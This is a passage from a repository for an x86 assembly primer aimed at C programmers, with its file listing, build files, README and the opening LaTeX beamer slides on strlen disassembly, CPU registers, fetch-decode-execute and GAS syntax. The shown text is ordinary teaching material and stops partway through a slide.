├── .gitignore
├── LICENSE
├── Makefile
├── README
├── apfcp.pdf
├── apfcp.tex
├── examples
    ├── 99_bottles_of_beer.S
    ├── Makefile
    ├── README
    ├── example-addrstack.c
    ├── example-arith-mov.S
    ├── example-cdecl.S
    ├── example-cond-jmp.S
    ├── example-ebp.S
    ├── example-hello-nasm.asm
    ├── example-indirect-mem.S
    ├── example-insecure.c
    ├── example-insecure_exploit.sh
    ├── example-libc.S
    ├── example-shellcode1.S
    ├── example-shellcode2.S
    ├── example-stack.S
    ├── example-static-alloc.S
    ├── example-string1.S
    ├── example-string2.S
    ├── example-strlen.c
    ├── example-syscall.S
    ├── extra
    │   ├── Makefile
    │   ├── base64.S
    │   ├── hexdump.S
    │   ├── line_counter.S
    │   └── line_counter_c.c
    ├── fibonacci.S
    ├── linked_list.S
    ├── morse_encoder.S
    └── tee.S
├── figures
    ├── 386fetch_decode_execute0.png
    ├── 386fetch_decode_execute1.png
    ├── 386fetch_decode_execute2.png
    ├── 386fetch_decode_execute3.png
    ├── 386fetch_decode_execute4.png
    ├── 386fetch_decode_execute5.png
    ├── 386fetch_decode_execute6.png
    ├── 386fetch_decode_execute7.png
    ├── 386state.png
    ├── 386statemem.png
    ├── 8086state.png
    ├── BORROWED_FIGURES.txt
    ├── apfcp_figures.svg
    ├── bufferoverflow.png
    ├── cpustate.png
    ├── eflags.png
    ├── gears.svg
    ├── hamster.jpg
    ├── ia32-eflags.png
    ├── lifostack.png
    ├── memlayout.png
    ├── memlayoutvm.png
    ├── monolithic.png
    ├── simd.png
    ├── stackframe.png
    ├── syscalls.png
    ├── x86stack.png
    ├── x86stackalloc.png
    ├── x86stackpop.png
    └── x86stackpush.png
└── pygments_objdump_mods.diff


/.gitignore:
--------------------------------------------------------------------------------
 1 | misc
 2 | pygments
 3 | apfcp.aux
 4 | apfcp.log
 5 | apfcp.nav
 6 | apfcp.out
 7 | apfcp.snm
 8 | apfcp.toc
 9 | apfcp.vrb
10 | apfcp.pyg
11 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | All apfcp figures and source, with the exception of the items listed below, are
2 | licensed Creative Commons Attribution-ShareAlike 3.0 Unported (CC BY-SA 3.0),
3 | 	- EXCEPT FOR the glibc strlen() snippet in examples/example-1.c, which
4 | 	  is licensed GNU Lesser General Public License
5 | 	- EXCEPT FOR the three figures described in figures/BORROWED_FIGURES.txt
6 | 
7 | Full license text is available at http://creativecommons.org/licenses/by-sa/3.0/.
8 | 
9 | 


--------------------------------------------------------------------------------
/Makefile:
--------------------------------------------------------------------------------
 1 | PROJECT=apfcp
 2 | 
 3 | # Note: I modified the default pygments objdump lexer to syntax highlight
 4 | # objdump output without expecting tabs (\t) on each line, so I could fit
 5 | # source examples into the slides.
 6 | #
 7 | # The modifications are contained in hg diff pygments_objdump_mods.diff
 8 | 
 9 | all:
10 | 	rm -f $(PROJECT).toc $(PROJECT).aux $(PROJECT).log $(PROJECT).nav $(PROJECT).out $(PROJECT).pdf $(PROJECT).snm $(PROJECT).vrb texput.log
11 | 	PATH=pygments/:$(PATH) pdflatex -shell-escape $(PROJECT).tex
12 | 	PATH=pygments/:$(PATH) pdflatex -shell-escape $(PROJECT).tex
13 | 	mupdf $(PROJECT).pdf
14 | 
15 | clean:
16 | 	rm -f $(PROJECT).toc $(PROJECT).aux $(PROJECT).log $(PROJECT).nav $(PROJECT).out $(PROJECT).snm $(PROJECT).vrb texput.log
17 | 


--------------------------------------------------------------------------------
/README:
--------------------------------------------------------------------------------
 1 | x86 Assembly Primer for C Programmers
 2 | Ivan Sergeev
 3 | Date: Jan 22 07:00pm - 09:00pm, Jan 24 07:00pm - 09:00pm in 4-231
 4 | 
 5 | A solid grasp of assembly language makes you a better programmer. Understanding
 6 | assembly gives you:
 7 | * insight into the true cost of high-level language operations (is modulus %
 8 |   cheap? when is it and when is it not?)
 9 | * a keen understanding of how program memory is managed and manipulated
10 | * ability to debug at the lowest level, which means you can catch the subtlest
11 |   of bugs
12 | * ability to utilize processor-specific instructions that squeeze the most out
13 |   of every clock cycle and available processor features
14 | * the appreciation of time / space advantages that different compiler
15 |   optimization settings can yield
16 | * a fluency with low-level detail that makes it easy to pick up new computer
17 |   architectures
18 | 
19 | Come to the x86 Assembly Primer and get a full introduction into x86 assembly
20 | language, program memory, stack frames, system calls, the role of libc, some of
21 | the convoluted nuances of x86, the x86-64 architecture, and some comparisons to
22 | other architectures. Enhance your quest in becoming a systems programming ninja
23 | here!
24 | 
25 | Platform: strictly x86-32 GNU/Linux, gcc toolchain.
26 | Assembly Syntax: AT&T/GAS.
27 | Prereqs: Intermediate C
28 | 
29 | 


--------------------------------------------------------------------------------
/apfcp.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vsergeev/apfcp/a8077d9d63ef418a1c40a7a24c4755ead8f6eced/apfcp.pdf


--------------------------------------------------------------------------------
/apfcp.tex:
--------------------------------------------------------------------------------
   1 | \documentclass[11pt,xcolor=dvipsnames]{beamer}
   2 | \usepackage{minted}
   3 | \usepackage{graphics}
   4 | 
   5 | \usecolortheme[named=Brown]{structure}
   6 | \usetheme{CambridgeUS}
   7 | 
   8 | \setbeamertemplate{navigation symbols}{}
   9 | \setbeamertemplate{section in toc}[ball unnumbered]
  10 | \setbeamertemplate{itemize item}[square]
  11 | \setbeamertemplate{itemize subitem}[square]
  12 | \setbeamerfont{frametitle}{size*={12}{1}}
  13 | \setbeamerfont{section in head/foot}{size*={9.5}{1}}
  14 | \setbeamersize{text margin left = 1em}
  15 | 
  16 | \usemintedstyle{perldoc}
  17 | \newminted{gas}{fontsize=\fontsize{9}{8},obeytabs=true}
  18 | \newminted{customobjdump}{fontsize=\fontsize{9}{8},obeytabs=true}
  19 | 
  20 | \newminted{c}{fontsize=\fontsize{9.25}{8.5},obeytabs=true}
  21 | \newminted{nasm}{fontsize=\fontsize{9.25}{8.5},obeytabs=true}
  22 | \newminted{bash}{fontsize=\fontsize{9.25}{8.5},obeytabs=true}
  23 | \newminted{text}{fontsize=\fontsize{9.25}{8.5},obeytabs=true}
  24 | 
  25 | \newcommand{\vs}{\vspace{0.5em}}
  26 | \newcommand{\mvs}{\vspace{-0.95em}}
  27 | 
  28 | \AtBeginSection{
  29 | \begin{frame}
  30 | \begin{center}
  31 | \structure{\huge \insertsection}
  32 | \end{center}
  33 | \end{frame}
  34 | }
  35 | 
  36 | \makeatletter
  37 | \setbeamertemplate{footline}
  38 | {
  39 |   \leavevmode%
  40 |   \hbox{%
  41 |   \begin{beamercolorbox}[wd=.50\paperwidth,ht=2.25ex,dp=1ex,center]{title in head/foot}%
  42 |     \usebeamerfont{title in head/foot}\insertshorttitle
  43 |   \end{beamercolorbox}%
  44 |   \begin{beamercolorbox}[wd=.50\paperwidth,ht=2.25ex,dp=1ex,right]{date in head/foot}%
  45 |     \usebeamerfont{date in head/foot}\insertshortdate{}\hspace*{2em}
  46 |     \insertframenumber{} / \inserttotalframenumber\hspace*{2ex}
  47 |   \end{beamercolorbox}}%
  48 |   \vskip0pt%
  49 | }
  50 | \makeatother
  51 | 
  52 | \makeatletter
  53 | \setbeamertemplate{headline}
  54 | {
  55 |   \leavevmode%
  56 |   \hbox{%
  57 |   \begin{beamercolorbox}[wd=\paperwidth,ht=5ex,dp=2.5ex,left]{section in head/foot}%
  58 |     \hspace*{2ex}\usebeamerfont{section in head/foot}\insertsectionhead
  59 |   \end{beamercolorbox} }%
  60 | %  \begin{beamercolorbox}[wd=.30\paperwidth,ht=5ex,dp=2.5ex,left]{subsection in head/foot}%
  61 | %    \usebeamerfont{subsection in head/foot}\hspace*{2ex}\insertsubsectionhead
  62 | %  \end{beamercolorbox}}%
  63 |   \vskip0pt%
  64 | }
  65 | \makeatother
  66 | 
  67 | \begin{document}
  68 | 
  69 | \title{x86 Assembly Primer for C Programmers}
  70 | \author{Ivan Sergeev}
  71 | \institute{\url{https://github.com/vsergeev/apfcp} \\ \vs {\ttfamily git clone git://github.com/vsergeev/apfcp.git}}
  72 | \date{January 22/24, 2013}
  73 | 
  74 | %%% Title Slide
  75 | \begin{frame}[plain]
  76 |   \titlepage
  77 | \end{frame}
  78 | 
  79 | \section*{Introduction and Example}
  80 | 
  81 | %%% Introduction and Example Slide 0
  82 | \begin{frame}[fragile,t]
  83 | \frametitle{Why Assembly?}
  84 | \begin{itemize}
  85 |     \item Embedded Systems
  86 |     \item Well-characterized execution time
  87 |     \item Bootstrapping an OS
  88 |     \item Compilers
  89 |     \item Debugging
  90 |     \item Fancy instructions
  91 |     \vs \vs
  92 |     \pause
  93 |     \item {\bf Sharpened intuition} on computing
  94 |     \begin{itemize}
  95 |         \item Gut instinct on implementation and feasibility
  96 |         \item Justification for liking powers of two
  97 |         \item Turing completeness is a special cage
  98 |     \end{itemize}
  99 | \end{itemize}
 100 | \end{frame}
 101 | 
 102 | 
 103 | %%% Introduction and Example Slide 1
 104 | \begin{frame}[fragile,t]
 105 | \frametitle{Reasonable strlen (example-strlen.c)}
 106 | Reasonable implementation of \verb+strlen()+ in C:\vs
 107 | \begin{ccode}
 108 | size_t ex_strlen(const char *s) {
 109 |     size_t i;
 110 |     for (i = 0; *s != '\0'; i++)
 111 |         s++;
 112 |     return i;
 113 | }
 114 | \end{ccode}
 115 | \end{frame}
 116 | 
 117 | %%% Introduction and Example Slide 2
 118 | \begin{frame}[fragile,t]
 119 | \frametitle{Reasonable strlen (example-strlen.c) Disassembly}
 120 | Let's compile and disassemble it.\vs
 121 | \begin{customobjdumpcode}
 122 | $ gcc -O1 example-strlen.c -o example-strlen
 123 | $ objdump -d example-strlen
 124 | 
 125 | ...
 126 | 080483b4 <ex_strlen>:
 127 |  80483b4: 8b 54 24 04     mov    0x4(%esp),%edx
 128 |  80483b8: b8 00 00 00 00  mov    $0x0,%eax
 129 |  80483bd: 80 3a 00        cmpb   $0x0,(%edx)
 130 |  80483c0: 74 09           je     80483cb <ex_strlen+0x17>
 131 |  80483c2: 83 c0 01        add    $0x1,%eax
 132 |  80483c5: 80 3c 02 00     cmpb   $0x0,(%edx,%eax,1)
 133 |  80483c9: 75 f7           jne    80483c2 <ex_strlen+0xe>
 134 |  80483cb: f3 c3           repz ret
 135 | ...
 136 | \end{customobjdumpcode}
 137 | \begin{itemize}
 138 | 	\item Output of optimization levels 2 and 3 only differs with added padding bytes for memory alignment.
 139 | \end{itemize}
 140 | \end{frame}
 141 | 
 142 | %% Introduction and Example Slide 3
 143 | \begin{frame}[fragile,t]
 144 | \frametitle{Reasonable strlen (example-strlen.c) Disassembly}
 145 | Commented disassembly for \verb+ex_strlen()+:\vs
 146 | \begin{gascode}
 147 | # size_t strlen(const char *s);
 148 | ex_strlen:
 149 |   mov    0x4(%esp),%edx       # %edx = argument s
 150 |   mov    $0x0,%eax            # %eax = 0
 151 |   cmpb   $0x0,(%edx)          # Compare *(%edx) with 0x00
 152 |   je     end                  #    If equal, jump to return
 153 | 
 154 |   loop:
 155 |     add    $0x1,%eax          # %eax += 1
 156 |     cmpb   $0x0,(%edx,%eax,1) # Compare *(%edx + %eax*1), 0x00
 157 |     jne    loop               #    If not equal, jump to add
 158 | 
 159 |   end:
 160 |   repz ret                  # Return, return value in %eax
 161 | \end{gascode}
 162 | \end{frame}
 163 | 
 164 | %%% Introduction and Example Slide 4
 165 | \begin{frame}[fragile,t]
 166 | \frametitle{glibc strlen (example-strlen.c)}
 167 | glibc's i386 implementation of \verb+strlen()+:\vs
 168 | \begin{customobjdumpcode}
 169 | $ cat glibc/sysdeps/i386/strlen.c
 170 | \end{customobjdumpcode}
 171 | \begin{ccode}
 172 | ...
 173 | size_t
 174 | strlen (const char *str)
 175 | {
 176 |   int cnt;
 177 | 
 178 |   asm("cld\n"                   /* Search forward.  */
 179 |       /* Some old versions of gas need `repne' instead of `repnz'.  */
 180 |       "repnz\n"                 /* Look for a zero byte.  */
 181 |       "scasb" /* %0, %1, %3 */ :
 182 |       "=c" (cnt) : "D" (str), "0" (-1), "a" (0));
 183 | 
 184 |   return -2 - cnt;
 185 | }
 186 | ...
 187 | \end{ccode}
 188 | \end{frame}
 189 | 
 190 | %%% Introduction and Example Slide 5
 191 | \begin{frame}[fragile,t]
 192 | \frametitle{glibc strlen (example-strlen.c) Disassembly}
 193 | Let's compile and disassemble it.\vs
 194 | \begin{customobjdumpcode}
 195 | $ gcc -O1 example-strlen.c -o example-strlen
 196 | $ objdump -d a.out
 197 | 
 198 | ...
 199 | 080483cd <glibc_strlen>:
 200 |  80483cd: 57                    push   %edi
 201 |  80483ce: b9 ff ff ff ff        mov    $0xffffffff,%ecx
 202 |  80483d3: b8 00 00 00 00        mov    $0x0,%eax
 203 |  80483d8: 8b 7c 24 08           mov    0x8(%esp),%edi
 204 |  80483dc: fc                    cld    
 205 |  80483dd: f2 ae                 repnz scas %es:(%edi),%al
 206 |  80483df: b8 fe ff ff ff        mov    $0xfffffffe,%eax
 207 |  80483e4: 29 c8                 sub    %ecx,%eax
 208 |  80483e6: 5f                    pop    %edi
 209 |  80483e7: c3                    ret  
 210 | ..
 211 | \end{customobjdumpcode}
 212 | \end{frame}
 213 | 
 214 | 
 215 | %%% Introduction and Example Slide 6
 216 | %\begin{frame}[fragile,t]
 217 | %\frametitle{glibc strlen (example-strlen.c) disassembly}
 218 | %Commented disassembly for glibc's \verb+strlen()+:\vs
 219 | %\begin{gascode}
 220 | %# size_t strlen(const char *s);
 221 | %strlen:
 222 | %  push   %edi               # Save %edi
 223 | %  mov    $0xffffffff,%ecx   # %ecx = 0xffffffff
 224 | %  mov    $0x0,%eax          # %eax = 0
 225 | %  mov    0x8(%esp),%edi     # %edi = argument s
 226 | %  cld                       # Clear direction flag
 227 | %
 228 | %  repnz scas %es:(%edi),%al # Repeat scan while *(%edi) != 0x0
 229 | %
 230 | %  mov    $0xfffffffe,%eax   # %eax = 0xfffffffe
 231 | %  sub    %ecx,%eax          # %eax = %eax - %ecx
 232 | %  pop    %edi               # Restore %edi
 233 | %  ret                       # Return, return value in %eax
 234 | %\end{gascode}
 235 | %\end{frame}
 236 | 
 237 | %%% Introduction and Example Slide 7
 238 | \begin{frame}[fragile,t]
 239 | \frametitle{Disassembly side-by-side}
 240 | A side-by-side comparison of the disassembly:\vspace{-0.8em}
 241 | \begin{columns}[T]
 242 | \column{0.5\textwidth}
 243 | \begin{customobjdumpcode*}{fontsize=\fontsize{6.5}{8},frame=single}
 244 | <ex_strlen>:
 245 | # Initialization
 246 | 8b 54 24 04     mov    0x4(%esp),%edx
 247 | b8 00 00 00 00  mov    $0x0,%eax
 248 | 80 3a 00        cmpb   $0x0,(%edx)
 249 | 74 09           je     80483cb <ex_strlen+0x17>
 250 | 
 251 | 
 252 | # Main loop
 253 | 83 c0 01        add    $0x1,%eax
 254 | 80 3c 02 00     cmpb   $0x0,(%edx,%eax,1)
 255 | 75 f7           jne    80483c2 <ex_strlen+0xe>
 256 | 
 257 | # End
 258 | f3 c3           repz ret
 259 | \end{customobjdumpcode*}
 260 | \column{0.5\textwidth}
 261 | \begin{customobjdumpcode*}{fontsize=\fontsize{6.5}{8},frame=single}
 262 | <glibc_strlen>:
 263 | # Initialization
 264 | 57              push   %edi
 265 | b9 ff ff ff ff  mov    $0xffffffff,%ecx
 266 | b8 00 00 00 00  mov    $0x0,%eax
 267 | 8b 7c 24 08     mov    0x8(%esp),%edi
 268 | fc              cld
 269 | 
 270 | # Main loop
 271 | f2 ae           repnz scas %es:(%edi),%al
 272 | 
 273 | 
 274 | 
 275 | # End
 276 | b8 fe ff ff ff  mov    $0xfffffffe,%eax
 277 | 29 c8           sub    %ecx,%eax
 278 | 5f              pop    %edi
 279 | c3              ret
 280 | \end{customobjdumpcode*}
 281 | \end{columns}
 282 | \end{frame}
 283 | 
 284 | %%% Introduction and Example Slide 8
 285 | \begin{frame}[fragile,t]
 286 | \frametitle{Disassembly side-by-side}
 287 | \mvs
 288 | A side-by-side comparison of the main loop disassembly:\vspace{-0.8em}
 289 | \begin{columns}[T]
 290 | \column{0.5\textwidth}
 291 | \begin{customobjdumpcode*}{fontsize=\fontsize{6.5}{8},frame=single}
 292 | <ex_strlen>:
 293 | ...
 294 | # Main loop
 295 | 83 c0 01        add    $0x1,%eax
 296 | 80 3c 02 00     cmpb   $0x0,(%edx,%eax,1)
 297 | 75 f7           jne    80483c2 <ex_strlen+0xe>
 298 | ...
 299 | \end{customobjdumpcode*}
 300 | \column{0.5\textwidth}
 301 | \begin{customobjdumpcode*}{fontsize=\fontsize{6.5}{8},frame=single}
 302 | <glibc_strlen>:
 303 | ...
 304 | # Main loop
 305 | f2 ae           repnz scas %es:(%edi),%al
 306 | 
 307 | 
 308 | ...
 309 | \end{customobjdumpcode*}
 310 | \end{columns}
 311 | \vs
 312 | \begin{itemize}
 313 |         \item glibc's i386 \verb+strlen()+ "main loop" is only 2 bytes!
 314 |         \begin{itemize}
 315 |                 \item In fact, it's only one instruction: \verb+repnz scas (%edi),%al+.
 316 |         \end{itemize}
 317 |         \pause
 318 |         \item Reasonable strlen's "main loop" is three instructions, with a conditional branch \verb+jne 0x80483c2+.
 319 |         \pause
 320 |         \item An older example of when hand-assembly utilized processor features for a more efficient implementation
 321 |         \item glibc's i486 and i586 implementations of {\ttfamily strlen()} are still assembly, but much more complicated, taking into account memory alignment and processor pipeline
 322 | \end{itemize}
 323 | \end{frame}
 324 | 
 325 | % Outline Slide
 326 | \section*{Table of Contents}
 327 | \begin{frame}{Outline}
 328 | \tableofcontents[part=1]
 329 | \end{frame}
 330 | 
 331 | \begin{frame}{Outline}
 332 | \tableofcontents[part=2]
 333 | \end{frame}
 334 | 
 335 | \part{1}
 336 | 
 337 | \section{Topic 1: State, Instructions, Fetch-Decode-Execute}
 338 | \begin{frame}[fragile,t]
 339 | 
 340 | \frametitle{State and Instructions}
 341 | \begin{itemize}
 342 |     \item State is retained information
 343 |     \begin{itemize}
 344 |         \item CPU Registers: small, built-in, referred to by name \\ ({\ttfamily \%eax, \%ebx, \%ecx, \%edx, ...})
 345 |         \item Memory: large, external, referred to by address \\ ({\ttfamily 0x80000000, ...})
 346 |     \end{itemize}
 347 |     \item Instructions affect and/or use state
 348 |     \begin{itemize}
 349 |         \item Add a constant to a register, subtract two registers, write to a memory location, jump to a memory location if a flag is set, etc.
 350 |     \end{itemize}
 351 |     \vs
 352 |     \pause
 353 |     \item Sufficient expressiveness of instructions makes a CPU Turing complete, provided you have infinite memory
 354 | \end{itemize}
 355 | \end{frame}
 356 | 
 357 | \begin{frame}[fragile,t]
 358 | \frametitle{8086 CPU Registers}
 359 | \mvs
 360 | \begin{figure}
 361 | \centering \includegraphics[width=0.85\textwidth]{figures/8086state.png}
 362 | \end{figure}
 363 | \begin{itemize}
 364 |     \item Original 8086 was a 16-bit CPU
 365 | \end{itemize}
 366 | \end{frame}
 367 | 
 368 | \begin{frame}[fragile,t]
 369 | \frametitle{386+ CPU Registers}
 370 | \mvs
 371 | \begin{figure}
 372 | \centering \includegraphics[width=0.85\textwidth]{figures/386state.png}
 373 | \end{figure}
 374 | \begin{itemize}
 375 |     \item 386+ is a 32-bit CPU, all registers extended to 32-bits
 376 | \end{itemize}
 377 | \end{frame}
 378 | 
 379 | \begin{frame}[fragile,t]
 380 | \frametitle{386+ CPU Registers and Memory}
 381 | \mvs
 382 | \begin{figure}
 383 | \centering \includegraphics[width=0.65\textwidth]{figures/386statemem.png}
 384 | \end{figure}
 385 | \begin{itemize}
 386 |     \item Registers + Memory comprise (almost) total system state
 387 | \end{itemize}
 388 | \end{frame}
 389 | 
 390 | \begin{frame}[fragile,t]
 391 | \frametitle{Instructions}
 392 | \begin{itemize}
 393 |     \item x86 instructions manipulate CPU registers, memory, and I/O ports
 394 |     \item Encoded as numbers, sitting in memory like any other data
 395 |     \item Uniquely defined for each architecture in its {\bf instruction set}
 396 |     \item {\ttfamily \%eip} contains address of next instruction
 397 |     \vs \vs \vs
 398 |     \pause
 399 |     \item Fetch-Decode-Execute Simplified CPU Model
 400 |     \begin{itemize}
 401 |         \item CPU {\bf fetches} data at address {\ttfamily \%eip} from main memory \\
 402 |         \item CPU {\bf decodes} data into an instruction \\
 403 |         \item CPU {\bf executes} instruction, \\ possibly manipulating memory, I/O, and its own state, including {\ttfamily \%eip}
 404 |     \end{itemize}
 405 | \end{itemize}
 406 | \end{frame}
 407 | 
 408 | \begin{frame}[fragile,t]
 409 | \frametitle{Instruction Fetch-Decode-Execute}
 410 | \mvs
 411 | \begin{figure}
 412 | \centering \includegraphics[width=0.65\textwidth]{figures/386fetch_decode_execute0.png}
 413 | \end{figure}
 414 | \end{frame}
 415 | 
 416 | \begin{frame}[fragile,t]
 417 | \frametitle{Instruction Fetch-Decode-Execute}
 418 | \mvs
 419 | \begin{figure}
 420 | \centering \includegraphics[width=0.65\textwidth]{figures/386fetch_decode_execute1.png}
 421 | \end{figure}
 422 | \end{frame}
 423 | 
 424 | \begin{frame}[fragile,t]
 425 | \frametitle{Instruction Fetch-Decode-Execute}
 426 | \mvs
 427 | \begin{figure}
 428 | \centering \includegraphics[width=0.65\textwidth]{figures/386fetch_decode_execute2.png}
 429 | \end{figure}
 430 | \end{frame}
 431 | 
 432 | \begin{frame}[fragile,t]
 433 | \frametitle{Instruction Fetch-Decode-Execute}
 434 | \mvs
 435 | \begin{figure}
 436 | \centering \includegraphics[width=0.65\textwidth]{figures/386fetch_decode_execute3.png}
 437 | \end{figure}
 438 | \end{frame}
 439 | 
 440 | \begin{frame}[fragile,t]
 441 | \frametitle{Instruction Fetch-Decode-Execute}
 442 | \mvs
 443 | \begin{figure}
 444 | \centering \includegraphics[width=0.65\textwidth]{figures/386fetch_decode_execute4.png}
 445 | \end{figure}
 446 | \end{frame}
 447 | 
 448 | \begin{frame}[fragile,t]
 449 | \frametitle{Instruction Fetch-Decode-Execute}
 450 | \mvs
 451 | \begin{figure}
 452 | \centering \includegraphics[width=0.65\textwidth]{figures/386fetch_decode_execute5.png}
 453 | \end{figure}
 454 | \end{frame}
 455 | 
 456 | \begin{frame}[fragile,t]
 457 | \frametitle{Instruction Fetch-Decode-Execute}
 458 | \mvs
 459 | \begin{figure}
 460 | \centering \includegraphics[width=0.65\textwidth]{figures/386fetch_decode_execute6.png}
 461 | \end{figure}
 462 | \end{frame}
 463 | 
 464 | \begin{frame}[fragile,t]
 465 | \frametitle{Instruction Fetch-Decode-Execute}
 466 | \mvs
 467 | \begin{figure}
 468 | \centering \includegraphics[width=0.65\textwidth]{figures/386fetch_decode_execute7.png}
 469 | \end{figure}
 470 | \end{frame}
 471 | 
 472 | \begin{frame}[fragile,t]
 473 | \frametitle{Sampling of Core 386+ User Instructions}
 474 | \mvs
 475 | \begin{itemize}
 476 |     \item {\bf Arithmetic:} {\ttfamily adc, add, and, cmp, dec, div, idiv, imul, inc, mul, neg, not, or, rcl, rcr, rol, ror, sal, sar, sbb, shl, shr, sub, test, xor, lea}
 477 |     \item {\bf Flags:} {\ttfamily clc / stc, cld / std, cli / sti, cmc}
 478 |     \item {\bf String:} {\ttfamily cmpsb / cmpsw, lodsb / lodsw, movsb / movsw, scasb / scasw, stosb / stosw, repxx}
 479 |     \item {\bf Stack:} {\ttfamily push, pop}
 480 |     \item {\bf Memory:} {\ttfamily mov}
 481 |     \item {\bf Flow Control:} {\ttfamily call, jxx, jmp, ret / retn / retf, loop/loopxx}
 482 |     \item {\bf Operating System:} {\ttfamily int, into, iret, hlt, pushf, popf, popad, popfd, pushad}
 483 |     \item {\bf Input/Output:} {\ttfamily in, out}
 484 |     \item {\bf Misc:} {\ttfamily aaa, aad, aam, aas, daa, cbw, cwd, lahf, lds, les, lock, wait, xchg, xlat, nop}
 485 | \end{itemize}
 486 | \end{frame}
 487 | 
 488 | \section{Topic 2: Arithmetic, and Data Transfer}
 489 | 
 490 | \begin{frame}[fragile,t]
 491 | \frametitle{Instructions in Assembly}
 492 | \begin{itemize}
 493 |     \item Instructions represented by a mnemonic and operands
 494 |     \item AT\&T/GAS syntax
 495 |     \begin{itemize}
 496 |     \item {\bf No operands:} \verb+<mnemonic>+
 497 |     \begin{itemize}
 498 |         \item {\ttfamily nop}
 499 |     \end{itemize}
 500 |     \item {\bf One operand:} \verb+<mnemonic> <dest>+
 501 |     \begin{itemize}
 502 |         \item {\ttfamily incl \%eax}
 503 |     \end{itemize}
 504 |     \item {\bf Two operands:} \verb+<mnemonic> <src>,<dest>+
 505 |     \begin{itemize}
 506 |         \item {\ttfamily addl \$0x1, \%eax}
 507 |     \end{itemize}
 508 |     \end{itemize}
 509 |     \vs
 510 |     \pause
 511 |     \item Source and destination operands are typically one of:
 512 |     \begin{itemize}
 513 |         \item {\bf Register:} {\ttfamily \%eax, \%ebx, \%ecx, \%edx,} etc.
 514 |         \begin{itemize}
 515 |             \item {\ttfamily movl \%eax, \%ebx}
 516 |         \end{itemize}
 517 |         \item {\bf Immediate:} constant value embedded in the instruction encoding
 518 |         \begin{itemize}
 519 |             \item {\ttfamily movl \$0x1, \%eax}
 520 |         \end{itemize}
 521 |         \item {\bf Memory:} constant value representing an absolute (0x80000000) or relative address (+4)
 522 |         \begin{itemize}
 523 |             \item {\ttfamily movl 0x800000000, \%eax}
 524 |         \end{itemize}
 525 |     \end{itemize}
 526 | \end{itemize}
 527 | \end{frame}
 528 | 
 529 | \begin{frame}[fragile,t]
 530 | \frametitle{Example Arithmetic and Data Transfer (example-arith-mov.S)}
 531 | \mvs
 532 | \begin{gascode}
 533 | .section .text
 534 |   nop                        # ; (Do nothing!)
 535 | 
 536 |   # add, sub, adc, and, or, xor
 537 |   addl %eax, %ebx            # %ebx = %ebx + %eax
 538 |   addl magicNumber, %ebx     # %ebx = %ebx + *(magicNumber)
 539 |   addl %ebx, magicNumber     # *(magicNumber) = *(magicNumber) + %ebx
 540 |   addl $0x12341234, %ebx     # %ebx = %ebx + 0x12341234
 541 | 
 542 |   # inc, dec, not, neg
 543 |   decl %eax                  # %eax--
 544 |   decw %ax                   # %ax--
 545 |   decb %al                   # %al--
 546 | 
 547 |   # rol, rcl, shl, shr, sal, sar
 548 |   shrl $3, %eax              # %eax = %eax >> 3
 549 |   shrl $3, magicNumber       # *(magicNumber) = *(magicNumber) >> 3
 550 | 
 551 |   # mov
 552 |   movl %eax, %ebx            # %ebx = %eax
 553 |   movl magicNumber, %eax     # %eax = *(magicNumber)
 554 |   movl %eax, magicNumber     # *(magicNumber) = %eax
 555 | 
 556 | .section .data
 557 |   magicNumber: .long 0xdeadbeef  # *magicNumber = 0xdeadbeef;
 558 | \end{gascode}
 559 | \end{frame}
 560 | 
 561 | \begin{frame}[fragile,t]
 562 | \frametitle{Ex. Arithmetic and Data Transfer (example-arith-mov.S) Disassembly}
 563 | \mvs
 564 | \begin{customobjdumpcode}
 565 | $ as example-arith-mov.S -o example-arith-mov.o
 566 | $ ld example-arith-mov.o -o example-arith-mov
 567 | $ objdump -D example-arith-mov
 568 | 
 569 | Disassembly of section .text:
 570 | 08048074 <.text>:
 571 |  8048074: 90                    nop
 572 |  8048075: 01 c3                 add    %eax,%ebx
 573 |  8048077: 03 1d a4 90 04 08     add    0x80490a4,%ebx
 574 |  804807d: 01 1d a4 90 04 08     add    %ebx,0x80490a4
 575 |  8048083: 81 c3 34 12 34 12     add    $0x12341234,%ebx
 576 |  8048089: 48                    dec    %eax
 577 |  804808a: 66 48                 dec    %ax
 578 |  804808c: fe c8                 dec    %al
 579 |  804808e: c1 e8 03              shr    $0x3,%eax
 580 |  8048091: c1 2d a4 90 04 08 03  shrl   $0x3,0x80490a4
 581 |  8048098: 89 c3                 mov    %eax,%ebx
 582 |  804809a: a1 a4 90 04 08        mov    0x80490a4,%eax
 583 |  804809f: a3 a4 90 04 08        mov    %eax,0x80490a4
 584 | 
 585 | Disassembly of section .data:
 586 | 080490a4 <magicNumber>:
 587 |  80490a4: ef                    out    %eax,(%dx)
 588 |  80490a5: be                    .byte 0xbe
 589 |  80490a6: ad                    lods   %ds:(%esi),%eax
 590 |  80490a7: de                    .byte 0xde
 591 | 
 592 | \end{customobjdumpcode}
 593 | \end{frame}
 594 | 
 595 | \begin{frame}[fragile,t]
 596 | \frametitle{A Note on GAS Syntax}
 597 | \begin{itemize}
 598 |     \item Syntax
 599 |     \begin{itemize}
 600 |         \item {\ttfamily \%} precedes a register: {\ttfamily \%eax}
 601 |         \item {\ttfamily \$} precedes a constant: {\ttfamily \$5, \$0xff, \$07, \$'A, \$0b111}
 602 |         \item {\ttfamily .} precedes a directive: {\ttfamily .byte, .long, .ascii, .section, .comm}
 603 | 	\item {\ttfamily \#} precedes a comment
 604 |         \vs
 605 |         \pause
 606 |         \item {\bf No special character precedes a dereferenced memory address:} \\ {\ttfamily movl \%eax, 0x80000000 \;\; \# *(0x80000000) = \%eax}
 607 |         \pause
 608 |         \item {\ttfamily mylabel:} defines a label, a symbol of name {\ttfamily mylabel} containing the address at that point
 609 |         \pause
 610 |     \end{itemize}
 611 |     \vs
 612 |     \item Directives
 613 |     \begin{itemize}
 614 |         \item Place a raw byte: {\ttfamily .byte 0xff}
 615 |         \item Place a raw short: {\ttfamily .short 0x1234}
 616 |         \item Place a raw ASCII string: {\ttfamily .ascii "Hello World!\textbackslash0"}
 617 |         \item Specify a section (e.g. .text, .data, .rodata, .bss): \\ {\ttfamily .section <section-name>}
 618 |     \end{itemize}
 619 | \end{itemize}
 620 | \end{frame}
 621 | 
 622 | \begin{frame}[fragile,t]
 623 | \frametitle{A Note on GAS Syntax}
 624 | \begin{itemize}
 625 |     \item Instruction Size Suffix
 626 |     \begin{itemize}
 627 |         \item x86 is backwards compatible to the original 8086
 628 |         \item Inherited instructions operate on 8-bits, 16-bits, 32-bits
